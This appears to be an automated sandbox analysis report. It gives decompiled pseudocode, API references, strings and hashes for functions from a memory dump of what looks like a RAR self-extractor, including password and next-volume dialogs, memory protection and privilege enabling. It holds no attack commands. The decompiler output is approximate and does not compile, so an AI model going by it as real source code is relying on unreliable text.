ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002703FB
CloseHandle.KERNEL32(?), ref: 00270415
DeleteCriticalSection.KERNEL32(?), ref: 0027042E
CloseHandle.KERNEL32(?), ref: 0027043A
CloseHandle.KERNEL32(?), ref: 00270446

Part of subcall function 002704BA: WaitForSingleObject.KERNEL32(?,000000FF,002705D9,?,?,0027064E,?,?,?,?,?,00270638), ref: 002704C0
Part of subcall function 002704BA: GetLastError.KERNEL32(?,?,0027064E,?,?,?,?,?,00270638), ref: 002704CC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: af70c63f7b8c1ab614ce3e69f8c1151fbc17086cf417059d0ca134a0bbd9e5c3
Instruction ID: 66cf0bd6f4aa873c12ca98186be70d4961de66c05c43320ebf81cda0b969e602
Opcode Fuzzy Hash: af70c63f7b8c1ab614ce3e69f8c1151fbc17086cf417059d0ca134a0bbd9e5c3
Instruction Fuzzy Hash: 5D01B572410704EBC7329F65EC89FC6BBEDFB58710F00451AF25E92160C7756958CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0028B461, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028B461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x29dd50; // 0x29dd44
					if(_t23 != 0) {
						E00287A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x29dd54; // 0x2c088c
					if(_t24 != 0) {
						E00287A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x29dd58; // 0x2c088c
					if(_t25 != 0) {
						E00287A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x29dd80; // 0x29dd48
					if(_t26 != 0) {
						E00287A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x29dd84; // 0x2c0890
					if(_t27 != 0) {
						return E00287A50(_t6);
					}
				}
				return _t6;
			}

0x0028b467
0x0028b46c
0x0028b470
0x0028b476
0x0028b479
0x0028b47e
0x0028b482
0x0028b488
0x0028b48b
0x0028b490
0x0028b494
0x0028b49a
0x0028b49d
0x0028b4a2
0x0028b4a6
0x0028b4ac
0x0028b4af
0x0028b4b4
0x0028b4b5
0x0028b4b8
0x0028b4be
0x00000000
0x0028b4c6
0x0028b4be
0x0028b4c9

APIs

_free.LIBCMT ref: 0028B479

Part of subcall function 00287A50: HeapFree.KERNEL32(00000000,00000000), ref: 00287A66
Part of subcall function 00287A50: GetLastError.KERNEL32(?,?,0028B4F8,?,00000000,?,00000000,?,0028B51F,?,00000007,?,?,0028B91C,?,?), ref: 00287A78

_free.LIBCMT ref: 0028B48B
_free.LIBCMT ref: 0028B49D
_free.LIBCMT ref: 0028B4AF
_free.LIBCMT ref: 0028B4C1

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d60d0e4e988db809c994ecf9f2507e86be9053dc94519a3e5d91b879f739ac3c
Instruction ID: f4b8f27e581ebaddd8f1e040c40345c15bc39eeb18591de92cf9d49b091691c5
Opcode Fuzzy Hash: d60d0e4e988db809c994ecf9f2507e86be9053dc94519a3e5d91b879f739ac3c
Instruction Fuzzy Hash: F5F04F3752A200EB8625FFA4F9DAC1A77D9AA00710B64580AF05DE7591C730FDA08B64

Uniqueness

Uniqueness Score: -1.00%

Function 002875DB, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E002875DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x29dd40; // 0x35c830
					if(_t7 != 0x29db20) {
						E00287A50(_t7);
						 *0x29dd40 = 0x29db20;
					}
				}
				E00287A50( *0x2c0410);
				 *0x2c0410 = 0;
				E00287A50( *0x2c0414);
				 *0x2c0414 = 0;
				E00287A50( *0x2c0860);
				 *0x2c0860 = 0;
				E00287A50( *0x2c0864);
				 *0x2c0864 = 0;
				return 1;
			}

0x002875e4
0x002875e8
0x002875ea
0x002875f6
0x002875f9
0x002875ff
0x002875ff
0x002875f6
0x0028760b
0x00287618
0x0028761e
0x00287629
0x0028762f
0x0028763a
0x00287640
0x00287648
0x00287651

APIs

_free.LIBCMT ref: 002875F9

Part of subcall function 00287A50: HeapFree.KERNEL32(00000000,00000000), ref: 00287A66
Part of subcall function 00287A50: GetLastError.KERNEL32(?,?,0028B4F8,?,00000000,?,00000000,?,0028B51F,?,00000007,?,?,0028B91C,?,?), ref: 00287A78

_free.LIBCMT ref: 0028760B
_free.LIBCMT ref: 0028761E
_free.LIBCMT ref: 0028762F
_free.LIBCMT ref: 00287640

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4248619ee39ef8673805f2ec1ed69061dbe80c37c71a6b9d0b62512f35ab2e27
Instruction ID: ac65afe31c39dddf5d51788f18b9fb5458f691f055a2545b0f007ab5a3d031fc
Opcode Fuzzy Hash: 4248619ee39ef8673805f2ec1ed69061dbe80c37c71a6b9d0b62512f35ab2e27
Instruction Fuzzy Hash: BBF0B479826228CB8619BF74BDC9C1E37E4B7047107125216F125762F1C7305A209FD4

Uniqueness

Uniqueness Score: -1.00%

Function 002673B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E002673B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0027D870(E00291321, _t61);
				E0027D940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E0026399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x2a0042 == 0) {
						if(E00267A15(L"SeSecurityPrivilege") != 0) {
							 *0x2a0041 = 1;
						}
						E00267A15(L"SeRestorePrivilege");
						 *0x2a0042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x2a0041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x29de80() == 0) {
						if(E0026B32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00266BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E0027E214(_t32);
							if(_t32 == 5 && E0026FC98() == 0) {
								E00261567(_t61 - 0x6c, 0x18);
								E00270A9F(_t61 - 0x6c);
							}
							E00266E03(0x2a00e0, 1);
						} else {
							_t39 =  *0x29de80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E0026159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x002673b9
0x002673b9
0x002673b9
0x002673be
0x002673c8
0x002673d0
0x002673d3
0x002673d6
0x002673d9
0x002673dc
0x002673df
0x002673e4
0x002673e5
0x002673e6
0x002673ec
0x002673f4
0x00267401
0x0026740f
0x00267411
0x00267411
0x0026741d
0x00267422
0x00267422
0x00267430
0x00267433
0x00267434
0x00267438
0x00267438
0x00267439
0x0026743a
0x0026743d
0x0026743e
0x0026743f
0x0026744a
0x00267462
0x00267477
0x00267480
0x00267485
0x00267494
0x0026749c
0x002674ac
0x002674b4
0x002674b4
0x002674bd
0x00267464
0x0026746d
0x00267473
0x00267475
0x00000000
0x00000000
0x00267475
0x00267462
0x002674c3
0x002674c7
0x002674d0
0x002674da

APIs

__EH_prolog.LIBCMT ref: 002673BE

Part of subcall function 0026399D: __EH_prolog.LIBCMT ref: 002639A2

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00267485

Part of subcall function 00267A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00267A24
Part of subcall function 00267A15: GetLastError.KERNEL32 ref: 00267A6A
Part of subcall function 00267A15: CloseHandle.KERNEL32(?), ref: 00267A79

Strings

SeSecurityPrivilege, xrefs: 00267403
SeRestorePrivilege, xrefs: 00267418

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 611073dbea987349dd5250a270ff899708d5fecad6344824e81c14c4bf70701a
Instruction ID: 42f5ecf5048da1b086ef4eaa760c93281fb79be437a27371de05404fe0f7ccf0
Opcode Fuzzy Hash: 611073dbea987349dd5250a270ff899708d5fecad6344824e81c14c4bf70701a
Instruction Fuzzy Hash: F231E731A24245AEDF20EFA4EC49BEE7B78AF15314F008055F849A7192CF754DA4CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00279B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00279B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E002612D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x2bfe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x2bfe38), ( *0x2bfe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E0026B943(__eflags,  *( *0x2bfe38)));
					_push( *( *0x2bfe38));
					_push(E0026DA42(_t25, 0x8e));
					_t22 = E002610B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x2bfe38));
					goto L13;
				}
				goto L6;
			}

0x00279b8e
0x00279b93
0x00279b98
0x00279b9d
0x00279bb5
0x00279c45
0x00279c47
0x00000000
0x00279c47
0x00279bbb
0x00279bc1
0x00279c34
0x00279c36
0x00279c3c
0x00279c3f
0x00000000
0x00279c3f
0x00279bc6
0x00279bda
0x00000000
0x00279bda
0x00279bcb
0x00279bce
0x00279c2a
0x00279c30
0x00279c14
0x00279c15
0x00000000
0x00279c15
0x00279bd0
0x00279bd3
0x00279c12
0x00000000
0x00279c12
0x00279bd8
0x00279be3
0x00279bec
0x00279bf2
0x00279bfe
0x00279c00
0x00279c05
0x00279c07
0x00000000
0x00000000
0x00279c0e
0x00000000
0x00279c0e
0x00000000

APIs

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

EndDialog.USER32(?,00000001), ref: 00279C15
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00279C2A
SetDlgItemTextW.USER32(?,00000066,?), ref: 00279C3F

Strings

ASKNEXTVOL, xrefs: 00279BA5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: b0cd87ef3bc12ca319bd365b7763e5ae9f762e3876bcb28853ca3362e6df8ecd
Instruction ID: 17831f7eacf216f3a2847db26098c3deaf2091ec1adac26bae11a8ba2416f3a2
Opcode Fuzzy Hash: b0cd87ef3bc12ca319bd365b7763e5ae9f762e3876bcb28853ca3362e6df8ecd
Instruction Fuzzy Hash: C1119A333642016FDA139F64ED4DF663BA8EB5B700F048016F6059A1B1C7B199A1DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0026E862, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0026E862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0x2a7358; // 0x0
				if(_t11 == 0) {
					E0026E7E3(0x2a7350);
					_t11 =  *0x2a7358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0x2a735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0x2a00e0);
							_t13 = E00266CC9(E0027E214(E00266CCE(_t22)), 0x2a00e0, 0x2a00e0, 2);
						}
					}
				}
				return _t13;
			}

0x0026e862
0x0026e862
0x0026e865
0x0026e86c
0x0026e873
0x0026e878
0x0026e878
0x0026e87e
0x0026e885
0x0026e88b
0x0026e892
0x0026e8c7
0x0026e8ce
0x00000000
0x0026e8d0
0x0026e8d5
0x0026e8d9
0x0026e8db
0x00000000
0x0026e8db
0x0026e8d9
0x0026e894
0x0026e896
0x0026e8e2
0x0026e8e2
0x0026e8e3
0x0026e8e9
0x0026e8eb
0x0026e8ef
0x0026e8f1
0x0026e8f2
0x0026e8f5
0x0026e8f8
0x0026e8fb
0x0026e8fe
0x0026e900
0x0026e901
0x0026e905
0x0026e898
0x0026e89d
0x0026e8a1
0x0026e8a3
0x0026e8a8
0x0026e8ad
0x0026e8c0
0x0026e8c0
0x0026e8a1
0x0026e896
0x0026e909

APIs

Part of subcall function 0026E7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026E802
Part of subcall function 0026E7E3: GetProcAddress.KERNEL32(002A7350,CryptUnprotectMemory,?,0026E85C,?,?,?,?), ref: 0026E812

GetCurrentProcessId.KERNEL32(?,?,?,0026E85C), ref: 0026E8E3

Strings

Ps*, xrefs: 0026E86E
CryptProtectMemory failed, xrefs: 0026E8A3
CryptUnprotectMemory failed, xrefs: 0026E8DB

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$Ps*
API String ID: 2190909847-4100656709
Opcode ID: f74a5e1a2a15dc8f4fe6ee8cdb2a61ca6e307b14afcbf1f223ca1d656553f424
Instruction ID: 2e5b8cf88643053a86aa74c96542d3cc83952a4af143d2b97d75aae65128bee7
Opcode Fuzzy Hash: f74a5e1a2a15dc8f4fe6ee8cdb2a61ca6e307b14afcbf1f223ca1d656553f424
Instruction Fuzzy Hash: 411157347252466BEF019F38DC49B6A3389DF85B54F064029F8009B1A2EF60DCF09690

Uniqueness

Uniqueness Score: -1.00%

Function 0026CE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0026CE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E002711FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0026FA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0026D9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x368ac0
					_t30 = E00284E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0026CC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x29d158 +  *_t30 * 0xc; // 0x2933e0
						E002854E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0026ce52
0x0026ce52
0x0026ce52
0x0026ce53
0x0026ce57
0x0026ce5e
0x0026ce64
0x0026ce74
0x0026ce7a
0x0026ce7e
0x0026ce81
0x0026ce8c
0x0026ce8c
0x0026ce94
0x0026ce97
0x0026ced2
0x0026ce99
0x0026ce99
0x0026ce9c
0x0026ceb1
0x0026ceb2
0x00000000
0x0026ce9e
0x0026cea1
0x0026cea6
0x0026cea7
0x0026ceb7
0x0026ceba
0x0026cebc
0x0026cebd
0x0026cec2
0x0026cec2
0x0026cea1
0x0026ce9c
0x0026cede
0x0026cee4
0x0026cee8
0x0026cef2
0x00000000
0x0026cef8
0x0026cefe
0x0026cf07
0x0026cf0f
0x0026cf0f
0x0026ce66
0x0026ce66
0x0026ce66
0x0026ce66
0x0026cf16

APIs

__fprintf_l.LIBCMT ref: 0026CEBD
_strncpy.LIBCMT ref: 0026CF07

Strings

$%s, xrefs: 0026CEB2
@%s, xrefs: 0026CEA7

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 473f6db04cf5fec62bff0a4e4e512623fa500003787e6d6f2bfe6df9f5d8113f
Instruction ID: 9439e4247e58f9bca47de2ac0d261470672f08c7dfc71776292bfc5b48bb0117
Opcode Fuzzy Hash: 473f6db04cf5fec62bff0a4e4e512623fa500003787e6d6f2bfe6df9f5d8113f
Instruction Fuzzy Hash: F3216D72460309AEDF20EEA4CD01FEE3BBCAB05700F204012FA5496592E372D6A89F60

Uniqueness

Uniqueness Score: -1.00%

Function 0027A0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0027A0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E002612D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0026E90C(_t24, 0x2b5c00,  &_v260);
					E0026E957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0027a0ba
0x0027a0be
0x0027a0c2
0x0027a0db
0x0027a14a
0x00000000
0x0027a14c
0x0027a0dd
0x0027a0e3
0x0027a144
0x00000000
0x0027a144
0x0027a0e8
0x0027a0f7
0x00000000
0x0027a0f7
0x0027a0ed
0x0027a0f0
0x0027a116
0x0027a128
0x0027a135
0x0027a13a
0x0027a0fd
0x0027a0fe
0x00000000
0x0027a0fe
0x0027a0f5
0x0027a0fb
0x00000000
0x0027a0fb
0x00000000

APIs

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

EndDialog.USER32(?,00000001), ref: 0027A0FE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0027A116
SetDlgItemTextW.USER32(?,00000067,?), ref: 0027A144

Strings

GETPASSWORD1, xrefs: 0027A0C9

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 615659952c25dbc3715bf32cf5001d0728d6ebf977ad468d3e69aa881c292107
Instruction ID: e04033bcdb4704ed6a5d259f46098f5957a77d11c7be9d544809d6e563e7d9e3
Opcode Fuzzy Hash: 615659952c25dbc3715bf32cf5001d0728d6ebf977ad468d3e69aa881c292107
Instruction Fuzzy Hash: B1110C3292011976DB119E689C49FFF777CEB4A760F414011FA4DB6080C6B599719662

Uniqueness

Uniqueness Score: -1.00%

Function 0026B1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0026B1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0026B4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00280BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00280BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00282B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00284DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00263E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0026b1b8
0x0026b1bf
0x0026b1c4
0x0026b1c7
0x0026b1ce
0x0026b1eb
0x0026b1ef
0x0026b1fa
0x0026b1fb
0x0026b1fc
0x0026b202
0x0026b205
0x0026b20a
0x0026b20b
0x0026b20c
0x0026b215
0x0026b21f
0x0026b217
0x0026b21b
0x0026b21b
0x0026b229
0x0026b22b
0x0026b230
0x0026b238
0x0026b23a
0x0026b23a
0x0026b205
0x00000000
0x0026b23e
0x00000000

APIs

_swprintf.LIBCMT ref: 0026B1DE

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

_wcschr.LIBVCRUNTIME ref: 0026B1FC
_wcschr.LIBVCRUNTIME ref: 0026B20C

Strings

